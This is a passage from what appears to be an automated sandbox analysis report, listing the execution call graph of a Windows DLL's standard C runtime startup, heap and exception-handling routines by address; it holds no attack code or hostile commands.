                        Signature Coverage:3.1%
                        Total number of Nodes:736
                        Total number of Limit Nodes:22
                        execution_graph 9685 6fb917a0 9690 6fb95d90 9685->9690 9687 6fb917b1 9706 6fb96b05 9687->9706 9693 6fb95dae __InternalCxxFrameHandler 9690->9693 9695 6fb95dd4 9690->9695 9691 6fb95ebe 9727 6fb91ec0 9691->9727 9693->9687 9694 6fb95ec3 9750 6fb91e20 9694->9750 9695->9691 9697 6fb95e28 9695->9697 9698 6fb95e4d 9695->9698 9697->9694 9709 6fb967d0 9697->9709 9700 6fb967d0 26 API calls 9698->9700 9704 6fb95e39 __InternalCxxFrameHandler 9698->9704 9700->9704 9702 6fb95eb9 9722 6fb999dc 9702->9722 9704->9702 9705 6fb95ea0 9704->9705 9705->9687 9811 6fb96ad8 9706->9811 9711 6fb967d5 ___std_exception_copy 9709->9711 9710 6fb967ef 9710->9704 9711->9710 9712 6fb99eaa _free 2 API calls 9711->9712 9713 6fb967f1 9711->9713 9712->9711 9714 6fb967fb 9713->9714 9715 6fb91e20 Concurrency::cancel_current_task 9713->9715 9717 6fb97b0e CallUnexpected RaiseException 9714->9717 9756 6fb97b0e 9715->9756 9719 6fb970a6 9717->9719 9718 6fb91e3c 9759 6fb97a8c 9718->9759 9774 6fb99968 9722->9774 9724 6fb999eb 9782 6fb999f9 IsProcessorFeaturePresent 9724->9782 9726 6fb999f8 9800 6fb96751 9727->9800 9751 6fb91e2e Concurrency::cancel_current_task 9750->9751 9752 6fb97b0e CallUnexpected RaiseException 9751->9752 9753 6fb91e3c 9752->9753 9754 6fb97a8c ___std_exception_copy 25 API calls 9753->9754 9755 6fb91e63 9754->9755 9757 6fb97b28 9756->9757 9758 6fb97b55 RaiseException 9756->9758 9757->9758 9758->9718 9760 6fb97a99 ___std_exception_copy 9759->9760 9764 6fb91e63 9759->9764 9761 6fb97ac6 9760->9761 9760->9764 9765 6fb9ae42 9760->9765 9763 6fb9ada7 ___std_exception_copy 14 API calls 9761->9763 9763->9764 9764->9704 9766 6fb9ae4f 9765->9766 9767 6fb9ae5d 9765->9767 9766->9767 9772 6fb9ae74 9766->9772 9768 6fb9b686 _free 14 API calls 9767->9768 9769 6fb9ae65 9768->9769 9770 6fb999cc ___std_exception_copy 25 API calls 9769->9770 9771 6fb9ae6f 9770->9771 9771->9761 9772->9771 9773 6fb9b686 _free 14 API calls 9772->9773 9773->9769 9775 6fb9b423 _free 14 API calls 9774->9775 9777 6fb99973 9775->9777 9776 6fb99981 9776->9724 9777->9776 9778 6fb999f9 ___std_exception_copy 11 API calls 9777->9778 9779 6fb999cb 9778->9779 9780 6fb99968 ___std_exception_copy 25 API calls 9779->9780 9781 6fb999d8 9780->9781 9781->9724 9783 6fb99a05 9782->9783 9786 6fb99820 9783->9786 9787 6fb9983c CallUnexpected 9786->9787 9788 6fb99868 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9787->9788 9791 6fb99939 CallUnexpected 9788->9791 9790 6fb99957 GetCurrentProcess TerminateProcess 9790->9726 9792 6fb96791 9791->9792 9793 6fb96799 9792->9793 9794 6fb9679a IsProcessorFeaturePresent 9792->9794 9793->9790 9796 6fb96b57 9794->9796 9799 6fb96b1a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9796->9799 9798 6fb96c3a 9798->9790 9799->9798 9805 6fb966b0 9800->9805 9803 6fb97b0e CallUnexpected RaiseException 9804 6fb96770 9803->9804 9808 6fb96660 9805->9808 9809 6fb97a8c ___std_exception_copy 25 API calls 9808->9809 9810 6fb9668c 9809->9810 9810->9803 9812 6fb96aee 9811->9812 9813 6fb96ae7 9811->9813 9820 6fb9ab9c 9812->9820 9817 6fb9ab30 9813->9817 9816 6fb917bb 9818 6fb9ab9c 28 API calls 9817->9818 9819 6fb9ab42 9818->9819 9819->9816 9823 6fb9a8b3 9820->9823 9824 6fb9a8bf __FrameHandler3::FrameUnwindToState 9823->9824 9831 6fb9b7d4 EnterCriticalSection 9824->9831 9826 6fb9a8cd 9832 6fb9a92d 9826->9832 9828 6fb9a8da 9842 6fb9a902 9828->9842 9831->9826 9833 6fb9a949 9832->9833 9836 6fb9a9c0 _free 9832->9836 9834 6fb9a9a0 9833->9834 9833->9836 9845 6fb9cd7b 9833->9845 9834->9836 9837 6fb9cd7b 28 API calls 9834->9837 9836->9828 9839 6fb9a9b6 9837->9839 9838 6fb9a996 9840 6fb9b90f _free 14 API calls 9838->9840 9841 6fb9b90f _free 14 API calls 9839->9841 9840->9834 9841->9836 9880 6fb9b81c LeaveCriticalSection 9842->9880 9844 6fb9a8eb 9844->9816 9846 6fb9cd88 9845->9846 9847 6fb9cda3 9845->9847 9846->9847 9848 6fb9cd94 9846->9848 9849 6fb9cdb2 9847->9849 9854 6fb9ed96 9847->9854 9850 6fb9b686 _free 14 API calls 9848->9850 9861 6fb9edc9 9849->9861 9853 6fb9cd99 CallUnexpected 9850->9853 9853->9838 9855 6fb9eda1 9854->9855 9856 6fb9edb6 HeapSize 9854->9856 9857 6fb9b686 _free 14 API calls 9855->9857 9856->9849 9858 6fb9eda6 9857->9858 9859 6fb999cc ___std_exception_copy 25 API calls 9858->9859 9860 6fb9edb1 9859->9860 9860->9849 9862 6fb9ede1 9861->9862 9863 6fb9edd6 9861->9863 9865 6fb9ede9 9862->9865 9871 6fb9edf2 _free 9862->9871 9873 6fb9b833 9863->9873 9866 6fb9b90f _free 14 API calls 9865->9866 9870 6fb9edde 9866->9870 9867 6fb9ee1c HeapReAlloc 9867->9870 9867->9871 9868 6fb9edf7 9869 6fb9b686 _free 14 API calls 9868->9869 9869->9870 9870->9853 9871->9867 9871->9868 9872 6fb99eaa _free 2 API calls 9871->9872 9872->9871 9874 6fb9b871 9873->9874 9878 6fb9b841 _free 9873->9878 9876 6fb9b686 _free 14 API calls 9874->9876 9875 6fb9b85c HeapAlloc 9877 6fb9b86f 9875->9877 9875->9878 9876->9877 9877->9870 9878->9874 9878->9875 9879 6fb99eaa _free 2 API calls 9878->9879 9879->9878 9880->9844 8930 6fb96d20 8931 6fb96d2b 8930->8931 8932 6fb96d5e 8930->8932 8934 6fb96d50 8931->8934 8935 6fb96d30 8931->8935 8969 6fb96e7a 8932->8969 8942 6fb96d73 8934->8942 8937 6fb96d46 8935->8937 8940 6fb96d35 8935->8940 8961 6fb968af 8937->8961 8939 6fb96d3a 8940->8939 8956 6fb968ce 8940->8956 8943 6fb96d7f __FrameHandler3::FrameUnwindToState 8942->8943 8992 6fb9693f 8943->8992 8945 6fb96d86 __DllMainCRTStartup@12 8946 6fb96dad 8945->8946 8947 6fb96e72 8945->8947 8953 6fb96de9 ___scrt_is_nonwritable_in_current_image CallUnexpected 8945->8953 9000 6fb968a1 8946->9000 9008 6fb97288 IsProcessorFeaturePresent 8947->9008 8950 6fb96e79 8951 6fb96dbc __RTC_Initialize 8951->8953 9003 6fb97490 InitializeSListHead 8951->9003 8953->8939 8954 6fb96dca 8954->8953 9004 6fb96876 8954->9004 9090 6fb9acea 8956->9090 9395 6fb97b99 8961->9395 8964 6fb968b8 8964->8939 8967 6fb968cb 8967->8939 8968 6fb97ba4 21 API calls 8968->8964 8970 6fb96e86 __FrameHandler3::FrameUnwindToState __DllMainCRTStartup@12 8969->8970 8971 6fb96f22 8970->8971 8972 6fb96eb7 8970->8972 8985 6fb96e8f 8970->8985 8973 6fb97288 __DllMainCRTStartup@12 4 API calls 8971->8973 9415 6fb9690f 8972->9415 8978 6fb96f29 __FrameHandler3::FrameUnwindToState 8973->8978 8975 6fb96ebc 9424 6fb9749c 8975->9424 8977 6fb96ec1 __RTC_Initialize __DllMainCRTStartup@12 9427 6fb96ab0 8977->9427 8979 6fb96f61 dllmain_raw 8978->8979 8980 6fb96f47 8978->8980 8988 6fb96f5c __DllMainCRTStartup@12 8978->8988 8979->8980 8981 6fb96f7b dllmain_crt_dispatch 8979->8981 8980->8939 8981->8980 8981->8988 8985->8939 8986 6fb96fcd 8986->8980 8987 6fb96fd6 dllmain_crt_dispatch 8986->8987 8987->8980 8989 6fb96fe9 dllmain_raw 8987->8989 8988->8986 8990 6fb96e7a __DllMainCRTStartup@12 79 API calls 8988->8990 8989->8980 8991 6fb96fc2 dllmain_raw 8990->8991 8991->8986 8993 6fb96948 8992->8993 9012 6fb970a7 IsProcessorFeaturePresent 8993->9012 8997 6fb96959 8999 6fb9695d 8997->8999 9022 6fb97baf 8997->9022 8999->8945 9084 6fb96978 9000->9084 9002 6fb968a8 9002->8951 9003->8954 9005 6fb9687b ___scrt_release_startup_lock 9004->9005 9006 6fb970a7 IsProcessorFeaturePresent 9005->9006 9007 6fb96884 9005->9007 9006->9007 9007->8953 9009 6fb9729e CallUnexpected 9008->9009 9010 6fb97349 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9009->9010 9011 6fb97394 CallUnexpected 9010->9011 9011->8950 9013 6fb96954 9012->9013 9014 6fb97b7a 9013->9014 9028 6fb98e1c 9014->9028 9018 6fb97b8b 9019 6fb97b96 9018->9019 9042 6fb98e58 9018->9042 9019->8997 9021 6fb97b83 9021->8997 9023 6fb97bb8 9022->9023 9024 6fb97bc2 9022->9024 9025 6fb9804e ___vcrt_uninitialize_ptd 6 API calls 9023->9025 9024->8999 9026 6fb97bbd 9025->9026 9027 6fb98e58 ___vcrt_uninitialize_locks DeleteCriticalSection 9026->9027 9027->9024 9029 6fb98e25 9028->9029 9031 6fb98e4e 9029->9031 9032 6fb97b7f 9029->9032 9046 6fb991c9 9029->9046 9033 6fb98e58 ___vcrt_uninitialize_locks DeleteCriticalSection 9031->9033 9032->9021 9034 6fb9801b 9032->9034 9033->9032 9065 6fb990da 9034->9065 9037 6fb98030 9037->9018 9040 6fb9804b 9040->9018 9043 6fb98e82 9042->9043 9044 6fb98e63 9042->9044 9043->9021 9045 6fb98e6d DeleteCriticalSection 9044->9045 9045->9043 9045->9045 9051 6fb99091 9046->9051 9049 6fb99201 InitializeCriticalSectionAndSpinCount 9050 6fb991ec 9049->9050 9050->9029 9052 6fb990a9 9051->9052 9053 6fb990cc 9051->9053 9052->9053 9057 6fb98ff7 9052->9057 9053->9049 9053->9050 9056 6fb990be GetProcAddress 9056->9053 9063 6fb99003 ___vcrt_FlsGetValue 9057->9063 9058 6fb99019 LoadLibraryExW 9060 6fb9907e 9058->9060 9061 6fb99037 GetLastError 9058->9061 9059 6fb99077 9059->9053 9059->9056 9060->9059 9062 6fb99086 FreeLibrary 9060->9062 9061->9063 9062->9059 9063->9058 9063->9059 9064 6fb99059 LoadLibraryExW 9063->9064 9064->9060 9064->9063 9066 6fb99091 ___vcrt_FlsGetValue 5 API calls 9065->9066 9067 6fb990f4 9066->9067 9068 6fb9910d TlsAlloc 9067->9068 9069 6fb98025 9067->9069 9069->9037 9070 6fb9918b 9069->9070 9071 6fb99091 ___vcrt_FlsGetValue 5 API calls 9070->9071 9072 6fb991a5 9071->9072 9073 6fb991c0 TlsSetValue 9072->9073 9074 6fb9803e 9072->9074 9073->9074 9074->9040 9075 6fb9804e 9074->9075 9076 6fb98058 9075->9076 9077 6fb9805e 9075->9077 9079 6fb99115 9076->9079 9077->9037 9080 6fb99091 ___vcrt_FlsGetValue 5 API calls 9079->9080 9081 6fb9912f 9080->9081 9082 6fb9913b 9081->9082 9083 6fb99147 TlsFree 9081->9083 9082->9077 9083->9082 9085 6fb96988 9084->9085 9086 6fb96984 9084->9086 9087 6fb97288 __DllMainCRTStartup@12 4 API calls 9085->9087 9089 6fb96995 ___scrt_release_startup_lock 9085->9089 9086->9002 9088 6fb969fe 9087->9088 9089->9002 9096 6fb9b2a0 9090->9096 9093 6fb97ba4 9375 6fb97f45 9093->9375 9097 6fb968d3 9096->9097 9098 6fb9b2aa 9096->9098 9097->9093 9104 6fb9d05d 9098->9104 9120 6fb9cefd 9104->9120 9107 6fb9b2b1 9107->9097 9109 6fb9d09c 9107->9109 9108 6fb9d094 TlsGetValue 9110 6fb9cefd _free 5 API calls 9109->9110 9111 6fb9d0b8 9110->9111 9112 6fb9b2c4 9111->9112 9113 6fb9d0d6 TlsSetValue 9111->9113 9114 6fb9b167 9112->9114 9115 6fb9b172 9114->9115 9119 6fb9b182 9114->9119 9134 6fb9b188 9115->9134 9119->9097 9121 6fb9cf2b 9120->9121 9126 6fb9cf27 9120->9126 9121->9126 9127 6fb9ce36 9121->9127 9124 6fb9cf45 GetProcAddress 9125 6fb9cf55 _free 9124->9125 9124->9126 9125->9126 9126->9107 9126->9108 9130 6fb9ce47 ___vcrt_FlsGetValue 9127->9130 9128 6fb9cef2 9128->9124 9128->9126 9129 6fb9ce65 LoadLibraryExW 9129->9130 9131 6fb9ce80 GetLastError 9129->9131 9130->9128 9130->9129 9132 6fb9cedb FreeLibrary 9130->9132 9133 6fb9ceb3 LoadLibraryExW 9130->9133 9131->9130 9132->9130 9133->9130 9135 6fb9b19d 9134->9135 9138 6fb9b1a3 9134->9138 9136 6fb9b90f _free 14 API calls 9135->9136 9136->9138 9137 6fb9b90f _free 14 API calls 9139 6fb9b1af 9137->9139 9138->9137 9140 6fb9b90f _free 14 API calls 9139->9140 9141 6fb9b1ba 9140->9141 9142 6fb9b90f _free 14 API calls 9141->9142 9143 6fb9b1c5 9142->9143 9144 6fb9b90f _free 14 API calls 9143->9144 9145 6fb9b1d0 9144->9145 9146 6fb9b90f _free 14 API calls 9145->9146 9147 6fb9b1db 9146->9147 9148 6fb9b90f _free 14 API calls 9147->9148 9149 6fb9b1e6 9148->9149 9150 6fb9b90f _free 14 API calls 9149->9150 9151 6fb9b1f1 9150->9151 9152 6fb9b90f _free 14 API calls 9151->9152 9153 6fb9b1fc 9152->9153 9154 6fb9b90f _free 14 API calls 9153->9154 9155 6fb9b20a 9154->9155 9166 6fb9afb4 9155->9166 9160 6fb9b90f 9161 6fb9b91a HeapFree 9160->9161 9162 6fb9b943 _free 9160->9162 9161->9162 9163 6fb9b92f 9161->9163 9162->9119 9306 6fb9b686 9163->9306 9167 6fb9afc0 __FrameHandler3::FrameUnwindToState 9166->9167 9182 6fb9b7d4 EnterCriticalSection 9167->9182 9169 6fb9aff4 9183 6fb9b013 9169->9183 9171 6fb9afca 9171->9169 9173 6fb9b90f _free 14 API calls 9171->9173 9173->9169 9174 6fb9b01f 9175 6fb9b02b __FrameHandler3::FrameUnwindToState 9174->9175 9187 6fb9b7d4 EnterCriticalSection 9175->9187 9177 6fb9b035 9188 6fb9b255 9177->9188 9179 6fb9b048 9192 6fb9b068 9179->9192 9182->9171 9186 6fb9b81c LeaveCriticalSection 9183->9186 9185 6fb9b001 9185->9174 9186->9185 9187->9177 9189 6fb9b28b __fassign 9188->9189 9190 6fb9b264 __fassign 9188->9190 9189->9179 9190->9189 9195 6fb9ddf0 9190->9195 9305 6fb9b81c LeaveCriticalSection 9192->9305 9194 6fb9b056 9194->9160 9197 6fb9de70 9195->9197 9198 6fb9de06 9195->9198 9200 6fb9b90f _free 14 API calls 9197->9200 9222 6fb9debe 9197->9222 9198->9197 9203 6fb9de39 9198->9203 9206 6fb9b90f _free 14 API calls 9198->9206 9199 6fb9decc 9210 6fb9df2c 9199->9210 9219 6fb9b90f 14 API calls _free 9199->9219 9201 6fb9de92 9200->9201 9202 6fb9b90f _free 14 API calls 9201->9202 9204 6fb9dea5 9202->9204 9207 6fb9b90f _free 14 API calls 9203->9207 9221 6fb9de5b 9203->9221 9208 6fb9b90f _free 14 API calls 9204->9208 9205 6fb9b90f _free 14 API calls 9209 6fb9de65 9205->9209 9211 6fb9de2e 9206->9211 9212 6fb9de50 9207->9212 9213 6fb9deb3 9208->9213 9214 6fb9b90f _free 14 API calls 9209->9214 9215 6fb9b90f _free 14 API calls 9210->9215 9223 6fb9e230 9211->9223 9251 6fb9e32e 9212->9251 9218 6fb9b90f _free 14 API calls 9213->9218 9214->9197 9220 6fb9df32 9215->9220 9218->9222 9219->9199 9220->9189 9221->9205 9263 6fb9df61 9222->9263 9224 6fb9e241 9223->9224 9250 6fb9e32a 9223->9250 9225 6fb9e252 9224->9225 9227 6fb9b90f _free 14 API calls 9224->9227 9226 6fb9e264 9225->9226 9228 6fb9b90f _free 14 API calls 9225->9228 9229 6fb9b90f _free 14 API calls 9226->9229 9230 6fb9e276 9226->9230 9227->9225 9228->9226 9229->9230 9231 6fb9b90f _free 14 API calls 9230->9231 9233 6fb9e288 9230->9233 9231->9233 9232 6fb9e29a 9234 6fb9e2ac 9232->9234 9236 6fb9b90f _free 14 API calls 9232->9236 9233->9232 9235 6fb9b90f _free 14 API calls 9233->9235 9237 6fb9e2be 9234->9237 9238 6fb9b90f _free 14 API calls 9234->9238 9235->9232 9236->9234 9239 6fb9e2d0 9237->9239 9240 6fb9b90f _free 14 API calls 9237->9240 9238->9237 9241 6fb9e2e2 9239->9241 9243 6fb9b90f _free 14 API calls 9239->9243 9240->9239 9242 6fb9e2f4 9241->9242 9244 6fb9b90f _free 14 API calls 9241->9244 9245 6fb9e306 9242->9245 9246 6fb9b90f _free 14 API calls 9242->9246 9243->9241 9244->9242 9247 6fb9e318 9245->9247 9248 6fb9b90f _free 14 API calls 9245->9248 9246->9245 9249 6fb9b90f _free 14 API calls 9247->9249 9247->9250 9248->9247 9249->9250 9250->9203 9252 6fb9e33b 9251->9252 9253 6fb9e393 9251->9253 9254 6fb9e34b 9252->9254 9255 6fb9b90f _free 14 API calls 9252->9255 9253->9221 9256 6fb9e35d 9254->9256 9257 6fb9b90f _free 14 API calls 9254->9257 9255->9254 9258 6fb9e36f 9256->9258 9260 6fb9b90f _free 14 API calls 9256->9260 9257->9256 9259 6fb9e381 9258->9259 9261 6fb9b90f _free 14 API calls 9258->9261 9259->9253 9262 6fb9b90f _free 14 API calls 9259->9262 9260->9258 9261->9259 9262->9253 9264 6fb9df6e 9263->9264 9268 6fb9df8d 9263->9268 9264->9268 9269 6fb9e3cf 9264->9269 9267 6fb9b90f _free 14 API calls 9267->9268 9268->9199 9270 6fb9df87 9269->9270 9271 6fb9e3e0 9269->9271 9270->9267 9272 6fb9e397 __fassign 14 API calls 9271->9272 9273 6fb9e3e8 9272->9273 9274 6fb9e397 __fassign 14 API calls 9273->9274 9275 6fb9e3f3 9274->9275 9276 6fb9e397 __fassign 14 API calls 9275->9276 9277 6fb9e3fe 9276->9277 9278 6fb9e397 __fassign 14 API calls 9277->9278 9279 6fb9e409 9278->9279 9280 6fb9e397 __fassign 14 API calls 9279->9280 9281 6fb9e417 9280->9281 9282 6fb9b90f _free 14 API calls 9281->9282 9283 6fb9e422 9282->9283 9284 6fb9b90f _free 14 API calls 9283->9284 9285 6fb9e42d 9284->9285 9286 6fb9b90f _free 14 API calls 9285->9286 9287 6fb9e438 9286->9287 9288 6fb9e397 __fassign 14 API calls 9287->9288 9289 6fb9e446 9288->9289 9290 6fb9e397 __fassign 14 API calls 9289->9290 9291 6fb9e454 9290->9291 9292 6fb9e397 __fassign 14 API calls 9291->9292 9293 6fb9e465 9292->9293 9294 6fb9e397 __fassign 14 API calls 9293->9294 9295 6fb9e473 9294->9295 9296 6fb9e397 __fassign 14 API calls 9295->9296 9297 6fb9e481 9296->9297 9298 6fb9b90f _free 14 API calls 9297->9298 9299 6fb9e48c 9298->9299 9300 6fb9b90f _free 14 API calls 9299->9300 9301 6fb9e497 9300->9301 9302 6fb9b90f _free 14 API calls 9301->9302 9303 6fb9e4a2 9302->9303 9304 6fb9b90f _free 14 API calls 9303->9304 9304->9270 9305->9194 9309 6fb9b423 GetLastError 9306->9309 9308 6fb9b68b GetLastError 9308->9162 9310 6fb9b43a 9309->9310 9311 6fb9b440 9309->9311 9312 6fb9d05d _free 6 API calls 9310->9312 9313 6fb9d09c _free 6 API calls 9311->9313 9331 6fb9b446 SetLastError 9311->9331 9312->9311 9314 6fb9b45e 9313->9314 9314->9331 9332 6fb9b8b2 9314->9332 9318 6fb9b48d 9321 6fb9d09c _free 6 API calls 9318->9321 9319 6fb9b476 9320 6fb9d09c _free 6 API calls 9319->9320 9322 6fb9b484 9320->9322 9323 6fb9b499 9321->9323 9327 6fb9b90f _free 12 API calls 9322->9327 9324 6fb9b49d 9323->9324 9325 6fb9b4ae 9323->9325 9328 6fb9d09c _free 6 API calls 9324->9328 9339 6fb9b0ce 9325->9339 9327->9331 9328->9322 9330 6fb9b90f _free 12 API calls 9330->9331 9331->9308 9337 6fb9b8bf _free 9332->9337 9333 6fb9b8ff 9336 6fb9b686 _free 13 API calls 9333->9336 9334 6fb9b8ea RtlAllocateHeap 9335 6fb9b46e 9334->9335 9334->9337 9335->9318 9335->9319 9336->9335 9337->9333 9337->9334 9344 6fb99eaa 9337->9344 9353 6fb9af62 9339->9353 9347 6fb99ed7 9344->9347 9348 6fb99ee3 __FrameHandler3::FrameUnwindToState 9347->9348 9349 6fb9b7d4 CallUnexpected EnterCriticalSection 9348->9349 9350 6fb99eee 9349->9350 9351 6fb99f2a _free LeaveCriticalSection 9350->9351 9352 6fb99eb5 9351->9352 9352->9337 9354 6fb9af6e __FrameHandler3::FrameUnwindToState 9353->9354 9367 6fb9b7d4 EnterCriticalSection 9354->9367 9356 6fb9af78 9368 6fb9afa8 9356->9368 9359 6fb9b074 9360 6fb9b080 __FrameHandler3::FrameUnwindToState 9359->9360 9371 6fb9b7d4 EnterCriticalSection 9360->9371 9362 6fb9b08a 9363 6fb9b255 _free 14 API calls 9362->9363 9364 6fb9b0a2 9363->9364 9372 6fb9b0c2 9364->9372 9367->9356 9369 6fb9b81c CallUnexpected LeaveCriticalSection 9368->9369 9370 6fb9af96 9369->9370 9370->9359 9371->9362 9373 6fb9b81c CallUnexpected LeaveCriticalSection 9372->9373 9374 6fb9b0b0 9373->9374 9374->9330 9376 6fb968d8 9375->9376 9377 6fb97f52 9375->9377 9376->8939 9378 6fb97f60 9377->9378 9383 6fb99150 9377->9383 9380 6fb9918b ___vcrt_FlsSetValue 6 API calls 9378->9380 9381 6fb97f70 9380->9381 9388 6fb97f29 9381->9388 9384 6fb99091 ___vcrt_FlsGetValue 5 API calls 9383->9384 9385 6fb9916a 9384->9385 9386 6fb99182 TlsGetValue 9385->9386 9387 6fb99176 9385->9387 9386->9387 9387->9378 9389 6fb97f40 9388->9389 9390 6fb97f33 9388->9390 9389->9376 9390->9389 9392 6fb9ada7 9390->9392 9393 6fb9b90f _free 14 API calls 9392->9393 9394 6fb9adbf 9393->9394 9394->9389 9401 6fb97f89 9395->9401 9397 6fb968b4 9397->8964 9398 6fb9acdf 9397->9398 9399 6fb9b423 _free 14 API calls 9398->9399 9400 6fb968c0 9399->9400 9400->8967 9400->8968 9402 6fb97f92 9401->9402 9403 6fb97f95 GetLastError 9401->9403 9402->9397 9404 6fb99150 ___vcrt_FlsGetValue 6 API calls 9403->9404 9405 6fb97faa 9404->9405 9406 6fb97fc9 9405->9406 9407 6fb9800f SetLastError 9405->9407 9408 6fb9918b ___vcrt_FlsSetValue 6 API calls 9405->9408 9406->9407 9407->9397 9409 6fb97fc3 CallUnexpected 9408->9409 9409->9406 9410 6fb97feb 9409->9410 9411 6fb9918b ___vcrt_FlsSetValue 6 API calls 9409->9411 9412 6fb9918b ___vcrt_FlsSetValue 6 API calls 9410->9412 9413 6fb97fff 9410->9413 9411->9410 9412->9413 9414 6fb9ada7 ___std_exception_copy 14 API calls 9413->9414 9414->9406 9416 6fb96914 ___scrt_release_startup_lock 9415->9416 9417 6fb96918 9416->9417 9418 6fb96924 __DllMainCRTStartup@12 9416->9418 9436 6fb9ab46 9417->9436 9421 6fb96931 9418->9421 9439 6fb9a1f0 9418->9439 9421->8975 9506 6fb97f06 InterlockedFlushSList 9424->9506 9428 6fb96abc 9427->9428 9429 6fb96ad2 9428->9429 9510 6fb9acf2 9428->9510 9433 6fb96f1c 9429->9433 9431 6fb96aca 9432 6fb97baf ___scrt_uninitialize_crt 7 API calls 9431->9432 9432->9429 9623 6fb96932 9433->9623 9450 6fb9a858 9436->9450 9440 6fb9a1fe 9439->9440 9449 6fb9a20f 9439->9449 9467 6fb9a296 GetModuleHandleW 9440->9467 9444 6fb9a249 9444->8975 9474 6fb9a0b6 9449->9474 9451 6fb9a864 __FrameHandler3::FrameUnwindToState 9450->9451 9458 6fb9b7d4 EnterCriticalSection 9451->9458 9453 6fb9a872 9459 6fb9aa56 9453->9459 9458->9453 9460 6fb9aa75 9459->9460 9461 6fb9a87f 9459->9461 9460->9461 9462 6fb9b90f _free 14 API calls 9460->9462 9463 6fb9a8a7 9461->9463 9462->9461 9466 6fb9b81c LeaveCriticalSection 9463->9466 9465 6fb96922 9465->8975 9466->9465 9468 6fb9a203 9467->9468 9468->9449 9469 6fb9a2d9 GetModuleHandleExW 9468->9469 9470 6fb9a2f8 GetProcAddress 9469->9470 9473 6fb9a30d 9469->9473 9470->9473 9471 6fb9a32a 9471->9449 9472 6fb9a321 FreeLibrary 9472->9471 9473->9471 9473->9472 9475 6fb9a0c2 __FrameHandler3::FrameUnwindToState 9474->9475 9490 6fb9b7d4 EnterCriticalSection 9475->9490 9477 6fb9a0cc 9491 6fb9a103 9477->9491 9479 6fb9a0d9 9495 6fb9a0f7 9479->9495 9482 6fb9a254 9499 6fb9b881 GetPEB 9482->9499 9485 6fb9a283 9488 6fb9a2d9 CallUnexpected 3 API calls 9485->9488 9486 6fb9a263 GetPEB 9486->9485 9487 6fb9a273 GetCurrentProcess TerminateProcess 9486->9487 9487->9485 9489 6fb9a28b ExitProcess 9488->9489 9490->9477 9492 6fb9a10f __FrameHandler3::FrameUnwindToState 9491->9492 9493 6fb9a170 CallUnexpected 9492->9493 9494 6fb9ab46 __DllMainCRTStartup@12 14 API calls 9492->9494 9493->9479 9494->9493 9498 6fb9b81c LeaveCriticalSection 9495->9498 9497 6fb9a0e5 9497->9444 9497->9482 9498->9497 9500 6fb9b89b 9499->9500 9501 6fb9a25e 9499->9501 9503 6fb9cf80 9500->9503 9501->9485 9501->9486 9504 6fb9cefd _free 5 API calls 9503->9504 9505 6fb9cf9c 9504->9505 9505->9501 9507 6fb974a6 9506->9507 9508 6fb97f16 9506->9508 9507->8977 9508->9507 9509 6fb9ada7 ___std_exception_copy 14 API calls 9508->9509 9509->9508 9511 6fb9acfd 9510->9511 9513 6fb9ad0f ___scrt_uninitialize_crt 9510->9513 9512 6fb9ad0b 9511->9512 9515 6fb9daab 9511->9515 9512->9431 9513->9431 9518 6fb9d959 9515->9518 9521 6fb9d8ad 9518->9521 9522 6fb9d8b9 __FrameHandler3::FrameUnwindToState 9521->9522 9529 6fb9b7d4 EnterCriticalSection 9522->9529 9524 6fb9d92f 9538 6fb9d94d 9524->9538 9528 6fb9d8c3 ___scrt_uninitialize_crt 9528->9524 9530 6fb9d821 9528->9530 9529->9528 9531 6fb9d82d __FrameHandler3::FrameUnwindToState 9530->9531 9541 6fb9dbc8 EnterCriticalSection 9531->9541 9533 6fb9d837 ___scrt_uninitialize_crt 9534 6fb9d870 9533->9534 9542 6fb9da63 9533->9542 9552 6fb9d8a1 9534->9552 9622 6fb9b81c LeaveCriticalSection 9538->9622 9540 6fb9d93b 9540->9512 9541->9533 9543 6fb9da79 9542->9543 9544 6fb9da70 9542->9544 9555 6fb9d9fe 9543->9555 9545 6fb9d959 ___scrt_uninitialize_crt 66 API calls 9544->9545 9547 6fb9da76 9545->9547 9547->9534 9550 6fb9da95 9568 6fb9f1df 9550->9568 9621 6fb9dbdc LeaveCriticalSection 9552->9621 9554 6fb9d88f 9554->9528 9556 6fb9da3b 9555->9556 9557 6fb9da16 9555->9557 9556->9547 9561 6fb9dd4c 9556->9561 9557->9556 9558 6fb9dd4c ___scrt_uninitialize_crt 25 API calls 9557->9558 9559 6fb9da34 9558->9559 9579 6fb9f9d7 9559->9579 9562 6fb9dd58 9561->9562 9563 6fb9dd6d 9561->9563 9564 6fb9b686 _free 14 API calls 9562->9564 9563->9550 9565 6fb9dd5d 9564->9565 9604 6fb999cc 9565->9604 9569 6fb9f1f0 9568->9569 9572 6fb9f1fd 9568->9572 9571 6fb9b686 _free 14 API calls 9569->9571 9570 6fb9f246 9573 6fb9b686 _free 14 API calls 9570->9573 9578 6fb9f1f5 9571->9578 9572->9570 9574 6fb9f224 9572->9574 9575 6fb9f24b 9573->9575 9607 6fb9f13d 9574->9607 9577 6fb999cc ___std_exception_copy 25 API calls 9575->9577 9577->9578 9578->9547 9580 6fb9f9e3 __FrameHandler3::FrameUnwindToState 9579->9580 9581 6fb9f9eb 9580->9581 9582 6fb9fa03 9580->9582 9584 6fb9b673 __dosmaperr 14 API calls 9581->9584 9583 6fb9fa9e 9582->9583 9587 6fb9fa35 9582->9587 9585 6fb9b673 __dosmaperr 14 API calls 9583->9585 9586 6fb9f9f0 9584->9586 9588 6fb9faa3 9585->9588 9589 6fb9b686 _free 14 API calls 9586->9589 9590 6fb9effc ___scrt_uninitialize_crt EnterCriticalSection 9587->9590 9591 6fb9b686 _free 14 API calls 9588->9591 9592 6fb9f9f8 9589->9592 9593 6fb9fa3b 9590->9593 9594 6fb9faab 9591->9594 9592->9556 9595 6fb9fa6c 9593->9595 9596 6fb9fa57 9593->9596 9597 6fb999cc ___std_exception_copy 25 API calls 9594->9597 9599 6fb9fac9 ___scrt_uninitialize_crt 60 API calls 9595->9599 9598 6fb9b686 _free 14 API calls 9596->9598 9597->9592 9600 6fb9fa5c 9598->9600 9601 6fb9fa67 9599->9601 9602 6fb9b673 __dosmaperr 14 API calls 9600->9602 9603 6fb9fa96 ___scrt_uninitialize_crt LeaveCriticalSection 9601->9603 9602->9601 9603->9592 9605 6fb99968 ___std_exception_copy 25 API calls 9604->9605 9606 6fb999d8 9605->9606 9606->9550 9608 6fb9f149 __FrameHandler3::FrameUnwindToState 9607->9608 9609 